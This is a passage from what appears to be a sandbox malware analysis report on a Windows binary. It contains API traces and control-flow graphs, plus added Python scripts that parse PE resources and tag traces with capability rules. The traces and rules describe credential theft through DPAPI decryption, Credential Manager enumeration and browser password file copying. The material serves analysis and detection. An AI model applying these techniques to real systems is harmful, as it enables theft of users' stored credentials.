• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
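The FindResourceW, LoadResource, SizeofResource, LockResource, memcpy sequence in the listing above is the standard Win32 way to read a blob that is embedded in the binary's own resource section. Read with the usual argument order (hModule, lpName, lpType), the trace shows the sample asking its own module (hModule 0) for resource name 0x32 of the custom type "BIN", copying the bytes into a buffer of its own, and handing them to the subroutines 40afcf, 40b4d3, 40b3c1 and 40b04b, whose purpose the trace does not show. The parser below is an added example, not Joe Sandbox output or code recovered from the sample: it walks the three-level IMAGE_RESOURCE_DIRECTORY tree (type, then name, then language) the way FindResourceW does, so the same lookup can be performed statically on a dump without running the binary. It runs on a constructed .rsrc section image with an assumed section RVA and a placeholder payload; against a real file you would carve the .rsrc section bytes and its RVA from the PE section table first and pass those in.

```python
import struct

# Constructed for this example: an assumed .rsrc section RVA and a placeholder payload.
# Neither value comes from the analysed sample.
RSRC_RVA = 0x59000
CONFIG = b"placeholder resource bytes, not a real config\x00"

HIGH = 0x80000000  # high bit set: entry points to a subdirectory / a name string
DIR_FMT, ENTRY_FMT, DATA_FMT = "<IIHHHH", "<II", "<IIII"  # IMAGE_RESOURCE_DIRECTORY / _ENTRY / _DATA_ENTRY


def build_rsrc(type_name, res_id, lang, payload, rva):
    """Build a minimal .rsrc image: root -> named type -> id -> language -> data entry."""
    off_root, off_type, off_lang, off_data, off_str = 0x00, 0x18, 0x30, 0x48, 0x58
    name = type_name.encode("utf-16le")
    off_payload = (off_str + 2 + len(name) + 7) & ~7  # keep the payload 8-byte aligned
    blob = bytearray(off_payload + len(payload))

    def directory(off, n_named, n_id):
        struct.pack_into(DIR_FMT, blob, off, 0, 0, 0, 0, n_named, n_id)

    def entry(off, key, target):
        struct.pack_into(ENTRY_FMT, blob, off, key, target)

    directory(off_root, 1, 0)
    entry(off_root + 16, HIGH | off_str, HIGH | off_type)  # named type -> type directory
    directory(off_type, 0, 1)
    entry(off_type + 16, res_id, HIGH | off_lang)          # numeric name -> language directory
    directory(off_lang, 0, 1)
    entry(off_lang + 16, lang, off_data)                   # language -> data entry (leaf)
    struct.pack_into(DATA_FMT, blob, off_data, rva + off_payload, len(payload), 0, 0)
    struct.pack_into("<H", blob, off_str, len(type_name))  # IMAGE_RESOURCE_DIR_STRING_U
    blob[off_str + 2:off_str + 2 + len(name)] = name
    blob[off_payload:] = payload
    return bytes(blob)


def _entries(blob, off):
    """Yield (key, target) for one directory; named keys are decoded to str, ids stay int."""
    _, _, _, _, n_named, n_id = struct.unpack_from(DIR_FMT, blob, off)
    for i in range(n_named + n_id):
        key, target = struct.unpack_from(ENTRY_FMT, blob, off + 16 + 8 * i)
        if key & HIGH:
            soff = key & ~HIGH
            (length,) = struct.unpack_from("<H", blob, soff)
            key = blob[soff + 2:soff + 2 + 2 * length].decode("utf-16le")
        yield key, target


def _match(key, wanted):
    # FindResource compares resource names case-insensitively; ids must match exactly.
    if isinstance(key, str) and isinstance(wanted, str):
        return key.upper() == wanted.upper()
    return key == wanted


def find_resource(blob, rsrc_rva, res_type, res_name):
    """Walk type -> name -> language like FindResourceW and return the first language's data."""
    for tkey, ttarget in _entries(blob, 0):
        if not _match(tkey, res_type) or not ttarget & HIGH:
            continue
        for nkey, ntarget in _entries(blob, ttarget & ~HIGH):
            if not _match(nkey, res_name) or not ntarget & HIGH:
                continue
            for _lang, ltarget in _entries(blob, ntarget & ~HIGH):
                if ltarget & HIGH:  # malformed: a fourth directory level
                    continue
                data_rva, size, _codepage, _reserved = struct.unpack_from(DATA_FMT, blob, ltarget)
                start = data_rva - rsrc_rva
                if start < 0 or start + size > len(blob):
                    raise ValueError("resource data entry points outside the .rsrc section")
                return bytes(blob[start:start + size])
    return None


# What the trace asked for: resource name 0x32 of type "BIN" in the sample's own module.
RSRC = build_rsrc("BIN", 0x32, 0x409, CONFIG, RSRC_RVA)


def demo():
    return find_resource(RSRC, RSRC_RVA, "BIN", 0x32)


if __name__ == "__main__":
    print(demo())
```

The size and RVA checks matter when the input is a memory dump rather than a file: a data entry whose RVA falls outside the carved section is the usual sign that the section table was read from the wrong image base.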
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 767404330-0
• Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
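The Toolhelp32 walk at 00413D6A-00413F1A and the CryptUnprotectData call at 00404498 are the two listings on this page a triage analyst would flag first. Reading the arguments as the trace prints them: CreateToolhelp32Snapshot(00000002, ...) is TH32CS_SNAPPROCESS; OpenProcess(00000410, ...) requests PROCESS_QUERY_INFORMATION | PROCESS_VM_READ; the 0000022C passed around Process32NextW is sizeof(PROCESSENTRY32W) on 32-bit Windows; and QueryFullProcessImageNameW, which exists only from Windows Vista onwards, is resolved through GetProcAddress rather than imported. In the DPAPI function, CryptUnprotectData is likewise reached through GetProcAddress from a library that the subcall at 0040A804 loads by a path built under the system directory, and the library is released with FreeLibrary afterwards, so the call needs no static import. The script below is an added example, not Joe Sandbox output: it parses the "APIs" bullets in the form they are printed on this page, decodes the OpenProcess access mask, and tags a function with a capability label when a rule's full API set appears among the function's own (non-subcall) calls. The rules and labels are this example's interpretation, not Joe Sandbox signature names; the sample input is copied from the listings on this page.

```python
import re
from collections import defaultdict

# Matches the "APIs" bullets as printed in this report, including the indented
# "Part of subcall function XXXX:" lines that belong to a callee.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Capability rules: every listed API must appear in the function's own calls.
# Labels are this example's interpretation, not Joe Sandbox signature names.
CAPABILITIES = {
    "process enumeration (analysis-tool / sandbox process checks)":
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "reads an embedded PE resource (config/payload carrier)":
        {"FindResourceW", "LoadResource", "LockResource"},
    "DPAPI decryption (stored browser/app credentials)": {"CryptUnprotectData"},
    "Credential Manager harvesting": {"CredEnumerateW"},
    "recursive file enumeration": {"FindFirstFileW", "FindNextFileW"},
}

# OpenProcess access-right bits (subset of the documented PROCESS_* constants).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def parse_api_lines(text):
    """Parse report bullets into dicts; non-matching lines (headers, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []  # '?' placeholders kept
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": int(m.group("ref"), 16), "subcall": m.group("sub")})
    return calls


def decode_process_access(mask):
    """Expand an OpenProcess dwDesiredAccess value into named rights, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def openprocess_rights(calls):
    """(ref, rights) for each OpenProcess call whose first argument the trace resolved."""
    return [(c["ref"], decode_process_access(int(c["args"][0], 16)))
            for c in calls if c["api"] == "OpenProcess" and c["args"] and c["args"][0] != "?"]


def tag_capabilities(calls, include_subcalls=False):
    """Return {label: sorted refs} for every rule whose API set is fully present."""
    seen = defaultdict(list)
    for c in calls:
        if c["subcall"] and not include_subcalls:
            continue
        seen[c["api"]].append(c["ref"])
    return {label: sorted(r for api in needed for r in seen[api])
            for label, needed in CAPABILITIES.items() if needed.issubset(seen)}


# Sample input: API bullets copied from the function listings on this page.
SAMPLE = r"""
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
• GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for label, refs in tag_capabilities(calls).items():
        print(f"{label}: {', '.join(f'{r:08X}' for r in refs)}")
    for ref, rights in openprocess_rights(calls):
        print(f"OpenProcess @ {ref:08X}: {' | '.join(rights)}")
```

Subcall lines are excluded by default on purpose: CredEnumerateW at 0040BDE9 belongs to the callee 0040BDB0, and attributing it to every caller that Joe Sandbox expands would make the same capability appear under several unrelated functions. Pass include_subcalls=True when you want the transitive view.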
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
• Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 00407082
  • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$memcpymemset
• String ID:
• API String ID: 2037443186-0
• Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
• Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
• Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
• Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 
409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 
445f3a-445f48 call 445093 274->281 281->264
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 1963886904-3798722523
• Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
• Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
• Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
• Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Control-flow Graph

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
• Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
• Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
• Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
• CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 1297422669-2783969131
• Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
• Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
• Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
• Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 504 40e2ab-40e2d5 call 40695d call 406b90 509 40e4a0-40e4af call 4069a3 504->509 510 40e2db-40e300 504->510 511 40e304-40e30f call 406e8f 510->511 515 40e314-40e316 511->515 516 40e476-40e483 call 406b53 515->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 515->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 